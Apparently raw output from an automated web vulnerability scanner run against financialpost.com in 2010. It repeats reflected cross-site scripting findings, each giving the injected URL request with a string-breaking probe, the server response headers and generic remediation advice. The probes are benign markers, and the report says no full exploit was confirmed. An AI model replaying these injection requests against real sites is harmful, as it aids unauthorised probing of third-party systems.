GET /markets/news16774'%3b529b04d3c55/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43236
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1f9'%3b8cef738f732 was submitted in the REST URL parameter 1. This input was echoed as fd1f9';8cef738f732 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /marketsfd1f9'%3b8cef738f732/portfolio/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:08:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36555
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b4b8'%3b7f13b8163b5 was submitted in the REST URL parameter 2. This input was echoed as 6b4b8';7f13b8163b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/portfolio6b4b8'%3b7f13b8163b5/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43336
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 649ce'%3b4439dbc4f71 was submitted in the REST URL parameter 1. This input was echoed as 649ce';4439dbc4f71 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets649ce'%3b4439dbc4f71/results/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43332
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71eb2'%3bf1a79b216fd was submitted in the REST URL parameter 2. This input was echoed as 71eb2';f1a79b216fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/results71eb2'%3bf1a79b216fd/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36478
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82fca'%3b5879819d15f was submitted in the REST URL parameter 3. This input was echoed as 82fca';5879819d15f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/results/82fca'%3b5879819d15f HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43338
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b104'%3bd58474cdcee was submitted in the REST URL parameter 1. This input was echoed as 3b104';d58474cdcee in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets3b104'%3bd58474cdcee/watchlist/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43371
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c584d'%3b08f996d92a7 was submitted in the REST URL parameter 2. This input was echoed as c584d';08f996d92a7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/watchlistc584d'%3b08f996d92a7/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43336
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31b1d'%3bb196f6b29d6 was submitted in the REST URL parameter 1. This input was echoed as 31b1d';b196f6b29d6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets31b1d'%3bb196f6b29d6/watchlist/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43372
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46f1'%3ba08a2ab8328 was submitted in the REST URL parameter 2. This input was echoed as a46f1';a08a2ab8328 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/watchlista46f1'%3ba08a2ab8328/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43336
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2418'%3bce201111d5b was submitted in the REST URL parameter 3. This input was echoed as a2418';ce201111d5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/watchlist/a2418'%3bce201111d5b HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43380
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f208'%3b0c5a12752b was submitted in the REST URL parameter 1. This input was echoed as 7f208';0c5a12752b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /most-popular7f208'%3b0c5a12752b/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:16:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36386
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a535'%3b42bfa164203 was submitted in the REST URL parameter 1. This input was echoed as 8a535';42bfa164203 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8a535'%3b42bfa164203/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36240
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c300'%3bc784a23242d was submitted in the REST URL parameter 1. This input was echoed as 3c300';c784a23242d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news3c300'%3bc784a23242d/FP500/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37381
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c6d'%3bfe08f537a24 was submitted in the REST URL parameter 2. This input was echoed as f5c6d';fe08f537a24 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/FP500f5c6d'%3bfe08f537a24/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff81'%3b99734784d32 was submitted in the REST URL parameter 1. This input was echoed as 8ff81';99734784d32 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8ff81'%3b99734784d32/business-insider/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37601
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d86'%3b8b9d58f9044 was submitted in the REST URL parameter 2. This input was echoed as 72d86';8b9d58f9044 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider72d86'%3b8b9d58f9044/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43410
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d79'%3b8edda2a7d69 was submitted in the REST URL parameter 1. This input was echoed as 91d79';8edda2a7d69 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news91d79'%3b8edda2a7d69/business-insider/ways+nail+first+impression/3987967/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 76139 Expires: Sun, 19 Dec 2010 03:10:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news91d79';8edda2a7d69/business-insider/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news91d79';8edda2a7d69;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83631043?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e64d5'%3be02aad2f8d9 was submitted in the REST URL parameter 2. This input was echoed as e64d5';e02aad2f8d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insidere64d5'%3be02aad2f8d9/ways+nail+first+impression/3987967/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83435 Expires: Sun, 19 Dec 2010 03:10:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:54 GMT Connection: close
